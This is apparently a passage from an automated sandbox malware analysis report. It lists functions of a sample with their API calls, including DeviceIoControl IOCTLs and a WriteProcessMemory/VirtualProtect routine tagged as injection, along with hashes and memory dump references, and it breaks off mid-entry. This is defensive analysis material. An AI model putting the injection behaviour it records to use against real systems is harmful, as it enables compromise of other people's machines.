                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDeviceMessage
                                                                • String ID:
                                                                • API String ID: 1404884426-0
                                                                • Opcode ID: a21ac81d700e5ac4341872182619fddb8151740b77b291bf2ea62385c52a3290
                                                                • Instruction ID: f4d38ee63f8403bc3912a389370e22b87f789c6d315d9236119e9f4301a71932
                                                                • Opcode Fuzzy Hash: a21ac81d700e5ac4341872182619fddb8151740b77b291bf2ea62385c52a3290
                                                                • Instruction Fuzzy Hash: DD5174B0E40319EBDF10DF96CC86BAE7BB4AF08714F10452AE6147B3D2D7795A108B59
                                                                Function 0049CAA2 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeviceIoControl.KERNEL32(?,00222058,?,00000018,?,00000008,?,00000000), ref: 0049CBE8
                                                                  • Part of subcall function 004CB120: MessageBoxA.USER32(00000000,00000000,0069258C,?), ref: 004CB343
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDeviceMessage
                                                                • String ID:
                                                                • API String ID: 1404884426-0
                                                                • Opcode ID: 8291c089f170d1e03003a87b3e600da69cddb2e3eec1f01f68a088a14c145e02
                                                                • Instruction ID: afd402f90841313596242ee053f0730fe8dd4410ebf9128321a31606de6587a6
                                                                • Opcode Fuzzy Hash: 8291c089f170d1e03003a87b3e600da69cddb2e3eec1f01f68a088a14c145e02
                                                                • Instruction Fuzzy Hash: 006173B1E40319ABDF10DF95CDC6BAE7BB4AF08314F10452AE618BB3C1D7795A108B69
                                                                Function 004B2BCA Relevance: 1.7, APIs: 1, Instructions: 184COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeviceIoControl.KERNEL32(00000001,002220E9,?,00000018,?,00000008,?,00000000), ref: 004B2D33
                                                                  • Part of subcall function 004CB120: MessageBoxA.USER32(00000000,00000000,0069258C,?), ref: 004CB343
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDeviceMessage
                                                                • String ID:
                                                                • API String ID: 1404884426-0
                                                                • Opcode ID: aa11473839054324e515e8eef2a43f93922f3122c3ea11f1c322b4152499502a
                                                                • Instruction ID: cfbad1ead4f9560ec85fdfb2e410c7878e5bc432a1edc1a19094dae036ffcced
                                                                • Opcode Fuzzy Hash: aa11473839054324e515e8eef2a43f93922f3122c3ea11f1c322b4152499502a
                                                                • Instruction Fuzzy Hash: 306145B0E40319EBDF10DF95CD86BEE7BB4BB08304F10452AE6057B381D3B95A108BA9
                                                                Function 0049C1F3 Relevance: 1.7, APIs: 1, Instructions: 165COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeviceIoControl.KERNEL32(?,00222024,?,00000018,?,00000008,?,00000000), ref: 0049C2DB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDevice
                                                                • String ID:
                                                                • API String ID: 2352790924-0
                                                                • Opcode ID: 6d384aded477d0ac4ce3ad0023731c029c9437c44bd07a91ed7cfde9678cdbea
                                                                • Instruction ID: 8e48bbca02e33de7053ccbbfce8ffaf4d8d5879e49821f2cf61633e6e3f36d89
                                                                • Opcode Fuzzy Hash: 6d384aded477d0ac4ce3ad0023731c029c9437c44bd07a91ed7cfde9678cdbea
                                                                • Instruction Fuzzy Hash: 5B5156B1E40319EBDF20DFA5DCC6BAEBBB4AF08314F10442AEA05B7381D7795A108B55
                                                                Function 0049E07A Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeviceIoControl.KERNEL32(?,0022201C,?,00000018,?,00000008,?,00000000), ref: 0049E162
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDevice
                                                                • String ID:
                                                                • API String ID: 2352790924-0
                                                                • Opcode ID: 4940e388daa41ab8471c09562efc06500ab93ef7195a1dac66c8a3f65a95f3d3
                                                                • Instruction ID: 737eaa5bffacee1542f3ce06e52fb28de966dbe0814050d69f851eb8bc267807
                                                                • Opcode Fuzzy Hash: 4940e388daa41ab8471c09562efc06500ab93ef7195a1dac66c8a3f65a95f3d3
                                                                • Instruction Fuzzy Hash: 1B5185B1E40319EBDF10DF96CC86BAE7BB5AF08310F14446EE604BB391D3795A108B59
                                                                Function 0049C606 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeviceIoControl.KERNEL32(?,00222054,?,00000020,?,00000008,?,00000000), ref: 0049C6F0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDevice
                                                                • String ID:
                                                                • API String ID: 2352790924-0
                                                                • Opcode ID: 16978b414df6d8f785b4921b18c6491b05f713c5245735083fb38240d7a7efa6
                                                                • Instruction ID: b8df226b9aae79d58310e339e487b03c33176ef852d247166fc81e3937556c1f
                                                                • Opcode Fuzzy Hash: 16978b414df6d8f785b4921b18c6491b05f713c5245735083fb38240d7a7efa6
                                                                • Instruction Fuzzy Hash: CB5155B1E4031AABDF10DFE5CCC5BAE7BB4AF08314F10446AE605BB382D3795A108B59
                                                                Function 004C49E0 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlMoveMemory.NTDLL(00000000,?,00000004), ref: 004C4BBF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryMove
                                                                • String ID:
                                                                • API String ID: 1951056069-0
                                                                • Opcode ID: 82bd44fc71ac042eded53aee86052a0248b65a40bf11a5cef351d30b165520b4
                                                                • Instruction ID: 582be7e361a78e5fd245c4c7436ddcc2297154965499e5fbc042dafd01c14ab9
                                                                • Opcode Fuzzy Hash: 82bd44fc71ac042eded53aee86052a0248b65a40bf11a5cef351d30b165520b4
                                                                • Instruction Fuzzy Hash: 88719130C0491DEBCF00AFE2E9596EEBB74FF88305F618099E0A175058DB7A4A75CB19
                                                                Function 0044695A Relevance: 1.6, APIs: 1, Instructions: 149injectionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000040,00000001,?,?,?,?,00000000,00000000,00000001), ref: 00446AF4
                                                                  • Part of subcall function 00446B2B: VirtualProtect.KERNEL32(00000040,00000001,?,00000000), ref: 00446B8B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryProcessProtectVirtualWrite
                                                                • String ID:
                                                                • API String ID: 214326562-0
                                                                • Opcode ID: fad1875c12a1367eba67d216d20904d6f0fd0f51eb21090476fe7f982c3c1b1a
                                                                • Instruction ID: c87de87545b18a9664a82c7bcd604e5904ce667f15f30f25660acb4a4e102b05
                                                                • Opcode Fuzzy Hash: fad1875c12a1367eba67d216d20904d6f0fd0f51eb21090476fe7f982c3c1b1a
                                                                • Instruction Fuzzy Hash: 484179B5E40209BBFB10DF91DC86FAE7774EB05705F104059FA04BA291D7B55E208B6A
                                                                Function 0049C406 Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeviceIoControl.KERNEL32(?,00222050,?,00000020,?,00000008,?,00000000), ref: 0049C575
                                                                  • Part of subcall function 004CB120: MessageBoxA.USER32(00000000,00000000,0069258C,?), ref: 004CB343
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDeviceMessage
                                                                • String ID:
                                                                • API String ID: 1404884426-0
                                                                • Opcode ID: 654414ead32c8c0ce55ec42a353a33baa3e443f2379d8576a0dd6c04bac783a8
                                                                • Instruction ID: ab91015293e3875629d7b56a84d44157946560d0a51d4492d07994485bf956ff
                                                                • Opcode Fuzzy Hash: 654414ead32c8c0ce55ec42a353a33baa3e443f2379d8576a0dd6c04bac783a8
                                                                • Instruction Fuzzy Hash: E6510CB5E00319EBDF10DF95C8C1B9EBBB4FB08314F10446AEA04AB342D375AA108B65
                                                                Function 004A2691 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ClientToScreen.USER32(00000001,00000000), ref: 004A26F3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ClientScreen
                                                                • String ID:
                                                                • API String ID: 3917795285-0
                                                                • Opcode ID: ff5a516927b6fd9b30ac5f6d3490f0b69dc686f5eb22e5b4bcb05aa9780407a4
                                                                • Instruction ID: 3c4937472f134a0a5ed4fc5feeaf850ee7c79077d3b3ef86de29c7c4503e7d5d
                                                                • Opcode Fuzzy Hash: ff5a516927b6fd9b30ac5f6d3490f0b69dc686f5eb22e5b4bcb05aa9780407a4
                                                                • Instruction Fuzzy Hash: 5551E174E00208EBDF00DF99D5C5B9DBBB0FF09304F5080A9E645AB252D7799E60DB66
                                                                Function 00470699 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00470785
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide
                                                                • String ID:
                                                                • API String ID: 626452242-0
                                                                • Opcode ID: c31d8e5cd0df59b9a291e70f7c49a9715559a29b586af889b26a60e9d2b762f1
                                                                • Instruction ID: 8a1c20e4b8b1d5c7d627422891df3ccfbb6e4846d7e40f7394e751f8a80812f5
                                                                • Opcode Fuzzy Hash: c31d8e5cd0df59b9a291e70f7c49a9715559a29b586af889b26a60e9d2b762f1
                                                                • Instruction Fuzzy Hash: CB4168B5E00308FBEB50DF95DC86FAF77B8DB04704F14406AFA04FA282D679A9108B59
                                                                Function 0049C08F Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeviceIoControl.KERNEL32(?,002221D8,?,00000018,?,?,?,00000000), ref: 0049C18A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDevice
                                                                • String ID:
                                                                • API String ID: 2352790924-0
                                                                • Opcode ID: 81e01e02ecfe56f313394893fa4ea270a473a364a7c262041bb0c3332370e662
                                                                • Instruction ID: 7f3f7621c13dad16b28b5e4f53a318b3d6b3b23024b951e5234537e9d0af132b
                                                                • Opcode Fuzzy Hash: 81e01e02ecfe56f313394893fa4ea270a473a364a7c262041bb0c3332370e662
                                                                • Instruction Fuzzy Hash: FC410DB1E00309AFDF40DFA5DDC6B9EBBB4FF08304F04446AE604A7242D7759A109BA5
                                                                Function 00450C8D Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTempFileNameA.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00450D62
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileNameTemp
                                                                • String ID:
                                                                • API String ID: 745986568-0
                                                                • Opcode ID: 969a77d809da31152a14b478da47bad69baa0823b25a9292252d7695a5ad7915
                                                                • Instruction ID: 94ada1855d7710cedb05b05438b261dbcf0a1c809f3297d9211da0cf9b069da8
                                                                • Opcode Fuzzy Hash: 969a77d809da31152a14b478da47bad69baa0823b25a9292252d7695a5ad7915
                                                                • Instruction Fuzzy Hash: E2318575A00304BFEB50EFA5DCC2FAE37B89B18314F14046AFA08AB243D675AD588755
                                                                Function 004641F5 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                Download Yara Rule
                                                                APIs
